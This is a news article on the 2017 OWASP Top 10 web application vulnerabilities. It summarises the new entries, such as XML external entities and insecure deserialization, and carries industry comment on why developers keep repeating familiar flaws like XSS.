Every three years the Open Web Application Security Project (OWASP) has the unenviable task of compiling a list of the top 10 web application vulnerabilities. It’s a guide to the top issues web developers should be looking out when coding because these are the biggest problems that lead to breaches.
The latest Top 10, released Tuesday, is distressingly familiar.
The OWASP’s task is unenviable because the list, compiled since 2004, doesn’t get smaller. In fact, regrettably, many of the same vulnerabilities appear on list after list — not necessarily in the same order — because software coders are sloppy/careless/reckless.
Some familiar issues include injection, broken authentication, cross-site scripting (XSS) and — holy cow, still in 2017 — security misconfiguration.
“The rapid pace of modern software development processes makes the most common risks essential to discover and resolve quickly and accurately,” says the project in its forward to this latest edition. ” We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.”
“It’s amusing and sad at the same time to see XSS in the list,” commented Ilia Kolochenko, CEO of security vendor High-Tech Bridge, “a plague of web applications that has been around for almost 15 years now. XSS vulnerabilities are quite simple to prevent and detect, nonetheless many Web developers still carelessly push code riddled with XSSs into production.”
He did admit that XSS problems have become more complicated to detect because often they reside in a Web application parts almost inaccessible for automated crawlers. Web technologies including HTML5, AJAX and SPA (single page applications) overcomplicate Web application architecture and cannot be reliably audited with old-school vulnerability scanners and automated tools, he added. “Flawed application business logic is probably the most complicated issue, as to detect such flaws, one needs to understand internal business processes of a company, and even bug bounties will unlikely ever detect them.”
The 2017 lists adds four new issues:
-#4: XML External Entities. Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks;
— #5: Broken Access Contol (which is actually a merging of two vulnerabilities from the 2013 list). Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.;
— #8: Insecure Deserialization. This often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks;
–#10 Insufficient Logging and Monitoring. Coupled with missing or ineffective integration with incident response, this allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data.
The list not only details the vulnerabilities and typical attack scenarios but also how CISOs and developers can prevent them from occurring.
Application security is no longer optional, the list’s authors warn organizations. “Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs. Given the staggering amount of code in the numerous applications and APIs already in production, many organizations are struggling to get a handle on the enormous volume of vulnerabilities.
“OWASP recommends organizations establish an application security program to gain insight and improve security across their applications and APIs. Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management. Security should be visible and measurable, so that all the different players can see and understand the organization’s application security
posture.”
The list was compiled by firms that specialize in application security and an industry survey that was completed by over 500 individuals. A primary aim of the OWASP Top 10 is to educate developers, designers, architects, managers, and organizations about the consequences of the most common and most important web application security weaknesses.
The OWASP offers a wide-range of papers with advice for developers and security testers here